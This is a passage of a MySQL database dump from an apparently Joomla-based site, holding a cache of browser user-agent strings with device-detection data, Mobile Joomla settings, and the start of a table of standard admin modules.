AppPkgID: ee.delfi.delfi.lv','',1735755159),('Mozilla/5.0 DelfiLVwww/618.0 EmbeddedBrowser (iPhone; CPU iPhone OS 18 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile DeviceUID: 98F78955-69E6-4FC0-86FE-30DF6FBC8E08 VendorUID: D45A3935-C3FE-401C-9B66-172A6E03A0DC AppPkgID: ee.delfi.delfi.lv','',1735768411),('Mozilla/5.0 DelfiLVwww/618.0 EmbeddedBrowser (iPhone; CPU iPhone OS 17 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile DeviceUID: 00000000-0000-0000-0000-000000000000 VendorUID: 2FEDE2D2-82FB-4594-9844-8ED486230FE1 AppPkgID: ee.delfi.delfi.lv','',1735805211),('Mozilla/5.0 (iPod touch; CPU iPhone OS 7 like Mac OS X) AppleWebKit/* (KHTML like Gecko) Mobile/11D167 Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1735811652),('Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1739501666),('Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; Sprint:PPC-6700; PPC; 240x320)','',1735884878),('Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1746039413),('Mozilla/5.0 (Linux; Android 14; SM-F946B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":872,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1736020348),('Mozilla/5.0 DelfiLVwww/618.0 EmbeddedBrowser (iPhone; CPU iPhone OS 18 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile DeviceUID: 00000000-0000-0000-0000-000000000000 VendorUID: D60A2876-17B9-42AD-8785-580DC01F4E93 AppPkgID: ee.delfi.delfi.lv','',1736330646),('Mozilla/5.0 (Linux; Android 12; DCO-LX9; HMSCore 6.14) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1736371319),('Mozilla/5.0 (Linux; Android 11; Lenovo TB-J706L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1736511919),('Opera/9.5 (Microsoft Windows; PPC; Opera Mobi) SonyEricssonX1i Profile/MIDP-2.0 Configuration/CLDC-1.1','',1736638034),('Mozilla/5.0 (Linux; Android 12; moto g(60)s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":984,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1736767215),('Linux Gnu (cow)','',1737032268),('Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; https://www.Nokia.com/genomecrawler)','',1739092985),('Mozilla/5.0 (Linux; Android 7.*; PACM00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1737202587),('Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1737239599),('Mozilla/5.0 (Linux; Android 9; ASUS_X00TD; Flow) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1741815849),('Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1738773334),('Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','',1740444385),('Mozilla/5.0 (Linux; Android 5.*; OPPO R9m) AppleWebKit/* (KHTML, like Gecko) Chrome','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1737551212),('Mozilla/5.0 (Linux; Android 6.*; OPPO R9s) AppleWebKit/* (KHTML, like Gecko) Chrome','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1737894915),('Mozilla/5.0 (Linux; Android 8.*; FIG-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1738074461),('Mozilla/5.0 (iPad; CPU OS 18 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1746379717),('Mozilla/5.0 (iPad; CPU OS 4 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1738457171),('Mozilla/5.0 (Linux; Android 15; 23122PCD1G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1738528037),('Mozilla/5.0 (Linux; Android 11; SM-T720) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":711,\"screenHeight\":1138,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1738800153),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-A156B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1739255455),('Mozilla/4.0 (compatible; MSIE 5.12; Mac_PowerPC)','',1739775084),('Mozilla/5.0 (Linux; Android 11; CPH2185) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1743744674),('Mozilla/5.0 (Linux; Android 11; V2055A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":875,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1743744685),('Mozilla/5.0 (iPhone; CPU iPhone OS 13 like Mac OS X) AppleWebKit/* (KHTML%2C like Gecko) Mobile/15E148','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1739896744),('Mozilla/5.0 (iPod touch; CPU iPhone OS 17 like Mac OS X) AppleWebKit','',1740093420),('Mozilla/5.0 (Linux; Android 12; zh-Hans-CN; JAD-AL50) AppleWebKit/* (KHTML, like Gecko) Chrome Quark/7.6 Mobile Safari/*','',1744018314),('Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1743927628),('Mozilla/5.0 (BlackBerry; BlackBerry 9800) AppleWebKit/* (KHTML, Like Gecko) Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1740321175),('Mozilla/5.0 (Linux; Android 13; 2201117TY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1740338420),('Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.Nokia.com/genomecrawler)','',1747995737),('Mozilla/5.0 (Fedora; Linux x86_64) Gecko/* Firefox/*','',1740645187),('Mozilla/5.0 (iPad; CPU OS 5 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1740869015),('Mozilla/5.0 (Linux; Android 14; SM-S926B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1741860534),('Mozilla/5.0 (Linux; Android 14; SM-S928B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1741870120),('Mozilla/5.0 (Macintosh Intel Mac OS X 10.15 rv:91.0) Gecko/* Firefox/*','',1741036244),('Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1741036408),('Mozilla/5.0 (compatible; Trance/1.0)','{\"type\":\"desktop\",\"markup\":\"\"}',1741128468),('Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/* (KHTML, like Gecko) Safari/*','',1741358057),('Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','',1741838111),('DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)','',1741883255),('Mozilla/5.0 (Fedora; Linux i686) Gecko/* Firefox/*','',1742478279),('Mozilla/5.0 (Knoppix; Linux x86_64) Gecko/* Firefox/*','',1742574287),('Mozilla/5.0 (Linux; Android 15; motorola edge 50 neo) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747461593),('Mozilla/4.76 (Windows NT 5.0)','{\"type\":\"desktop\",\"markup\":\"\"}',1743011569),('Mozilla/5.0 (Linux; Android 14; 24115RA8EG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1743543127),('Mozilla/5.0 (Linux; Android 13; 22071212AG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1743562617),('Mozilla/5.0 (Debian; Linux x86_64) Gecko/* Firefox/*','',1743753628),('Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1743753638),('Mozilla/5.0 (Linux; Android 14; SM-S721B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1743859833),('SonyEricssonW810i Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":170,\"screenHeight\":200,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1744173340),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1744194892),('Android_Ant_Client','',1744964481),('Mozilla/5.0 (Kubuntu; Linux i686) Gecko/* Firefox/*','',1745183646),('Mozilla/5.0 (Linux; Android 14; SM-A528B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747113271),('Mozilla/5.0 (Linux; Android 15; 23078PND5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1745393564),('Mozilla/5.0 (Linux; Android 14; 2311DRK48G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1745525800),('Mozilla/5.0 (SS; Linux i686) Gecko/* Firefox/*','',1745689739),('Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1745690862),('Mozilla/5.0 (Linux; Android 4.*; KFTHWI) AppleWebKit/* (KHTML, like Gecko) Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1745816517),('Mozilla/5.0 (Android 15; Mobile; LG-M255) Firefox/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1746067194),('Mozilla/5.0 (ZZ; Linux x86_64) Gecko/* Firefox/*','',1746343732),('Mozilla/6.0 (compatible)','{\"type\":\"desktop\",\"markup\":\"\"}',1746378754),('Mozilla/5.0 (Linux; Android 15; Pixel 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1746870037),('Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/* (KHTML, like Gecko) Edge/114.0 Safari/*','',1746940371),('Mozilla/5.0 (ZZ; Linux i686) Gecko/* Firefox/*','',1746951576),('Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1746981419),('Mozilla/5.0 (Linux; Android 10; SM-G955U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747010557),('Mozilla/5.0 (Linux; Android 4.*; RCT6077W2) AppleWebKit/* (KHTML, like Gecko) Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747052504),('Mozilla/5.0 (Android 2.*; Windows; Windows NT 6.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','',1747353034),('Mozilla/5.0 (SymbianOS/*; Series60/* Nokia6120c; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/* (KHTML, like Gecko) Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1747353035),('Mozilla/5.0 (Linux; Android 7.*; i1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747412301),('Mozilla/5.0 (Ubuntu; Linux i686) Gecko/* Firefox/*','',1747590242),('Mozilla/5.0 (Linux; Android 10; Galaxy S10e) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747813009),('Mozilla/4.038533357 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) QQBrowser/6.0','',1747959485),('Mozilla/5.0 (Linux; Android 12; SM-G977B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747986110),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 6.15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748120605),('Mozilla/5.0 (Linux; Android 5.*; SM-N9005) AppleWebKit/* (KHTML, like Gecko) Chrome','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748493045);
/*!40000 ALTER TABLE `xyhmu_mj_amdd_cache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_mj_modules`
--

DROP TABLE IF EXISTS `xyhmu_mj_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_mj_modules` (
  `id` int(11) NOT NULL,
  `device` varchar(32) NOT NULL,
  PRIMARY KEY (`device`,`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_mj_modules`
--

LOCK TABLES `xyhmu_mj_modules` WRITE;
/*!40000 ALTER TABLE `xyhmu_mj_modules` DISABLE KEYS */;
INSERT INTO `xyhmu_mj_modules` VALUES (212,'desktop'),(152,'mobile');
/*!40000 ALTER TABLE `xyhmu_mj_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_mj_plugins`
--

DROP TABLE IF EXISTS `xyhmu_mj_plugins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_mj_plugins` (
  `id` int(11) NOT NULL,
  `device` varchar(32) NOT NULL,
  PRIMARY KEY (`device`,`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_mj_plugins`
--

LOCK TABLES `xyhmu_mj_plugins` WRITE;
/*!40000 ALTER TABLE `xyhmu_mj_plugins` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_mj_plugins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_mj_settings`
--

DROP TABLE IF EXISTS `xyhmu_mj_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_mj_settings` (
  `name` varchar(32) NOT NULL,
  `value` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_mj_settings`
--

LOCK TABLES `xyhmu_mj_settings` WRITE;
/*!40000 ALTER TABLE `xyhmu_mj_settings` DISABLE KEYS */;
INSERT INTO `xyhmu_mj_settings` VALUES ('nomjitems',''),('version','2.1.51'),('autoupdate','0'),('caching','0'),('canonical','1'),('desktop_domain','www.infotytuvenai.lt'),('distribmode',''),('httpcaching','0'),('jpegquality','90'),('mobile_sitename',''),('noindex','1'),('ress_optimize','1'),('ress_streamoptimizer','0'),('varyua','0'),('.buffer_width','0'),('.componenthome','1'),('.css_inlinelimit','1024'),('.css_loadurl','1'),('.css_merge','1'),('.css_mergeinline','0'),('.css_optimize','1'),('.css_excludelist',''),('.css_minifyattribute','0'),('.gzip','0'),('.homepage','index.php?option=com_content&view=article&id=175&Itemid=287'),('.html_mergespace','1'),('.html_minifyurl','1'),('.html_removecomments','1'),('.html_sortattr','1'),('.html_removedefattr','1'),('.html_removeiecond','1'),('.html_lazyiframe','0'),('.img','0'),('.img_addstyles','0'),('.img_lazyload','1'),('.img_optimize','0'),('.img_wrapwide','0'),('.jfooter','1'),('.js_autoasync','1'),('.js_inlinelimit','1024'),('.js_loadurl','0'),('.js_merge','1'),('.js_mergeinline','0'),('.js_optimize','0'),('.js_wraptrycatch','0'),('.js_excludelist','tinymce.min.js\r\n'),('.js_minifyattribute','0'),('.removetags','1'),('.template',''),('html_minifyurl','0'),('mobile.template',''),('autoupdate_next_check','1652721695'),('mobile.domain',''),('mobile.homepage','index.php?option=com_content&view=featured&Itemid=101'),('mobile.gzip',''),('mobile.removetags',''),('mobile.html_removecomments',''),('mobile.html_mergespace',''),('mobile.html_minifyurl',''),('mobile.html_sortattr',''),('mobile.html_removedefattr',''),('mobile.html_removeiecond',''),('mobile.img',''),('mobile.img_optimize',''),('mobile.buffer_width',''),('mobile.img_addstyles',''),('mobile.css_merge',''),('mobile.css_mergeinline',''),('mobile.css_loadurl',''),('mobile.css_optimize',''),('mobile.css_minifyattribute',''),('mobile.css_inlinelimit',''),('mobile.js_merge',''),('mobile.js_mergeinline',''),('mobile.js_loadurl',''),('mobile.js_optimize',''),('mobile.js_minifyattribute',''),('mobile.js_wraptrycatch',''),('mobile.js_autoasync',''),('mobile.js_inlinelimit','');
/*!40000 ALTER TABLE `xyhmu_mj_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_modules`
--

DROP TABLE IF EXISTS `xyhmu_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_modules` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(100) NOT NULL DEFAULT '',
  `note` varchar(255) NOT NULL DEFAULT '',
  `content` text NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `position` varchar(50) NOT NULL DEFAULT '',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `module` varchar(50) DEFAULT NULL,
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `showtitle` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `params` text NOT NULL,
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  `language` char(7) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `published` (`published`,`access`),
  KEY `newsfeeds` (`module`,`published`),
  KEY `idx_language` (`language`)
) ENGINE=MyISAM AUTO_INCREMENT=213 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_modules`
--

LOCK TABLES `xyhmu_modules` WRITE;
/*!40000 ALTER TABLE `xyhmu_modules` DISABLE KEYS */;
INSERT INTO `xyhmu_modules` VALUES (2,'Login','','',1,'login',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'',1,'*'),(3,'Popular Articles','','',3,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_popular',3,1,'{\"count\":\"5\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(4,'Recently Added Articles','','',4,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_latest',3,1,'{\"count\":\"5\",\"ordering\":\"c_dsc\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(8,'Toolbar','','',1,'toolbar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_toolbar',3,1,'',1,'*'),(9,'Quick Icons','','',1,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_quickicon',3,1,'',1,'*'),(10,'Logged-in Users','','',2,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_logged',3,1,'{\"count\":\"5\",\"name\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(12,'Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',3,1,'{\"layout\":\"\",\"moduleclass_sfx\":\"\",\"shownew\":\"1\",\"showhelp\":\"1\",\"cache\":\"0\"}',1,'*'),(13,'Admin Submenu','','',1,'submenu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_submenu',3,1,'',1,'*'),(14,'User Status','','',2,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_status',3,1,'',1,'*'),(15,'Title','','',1,'title',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_title',3,1,'',1,'*'),(79,'Multilanguage status','','',1,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_multilangstatus',3,1,'{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(86,'Joomla Version','','',1,'footer',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_version',3,1,'{\"format\":\"short\",\"product\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(87,'Menu Module','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Far far away, behind the word mountains, far from the countries.<br />Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore.</p>',0,'menumodule',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 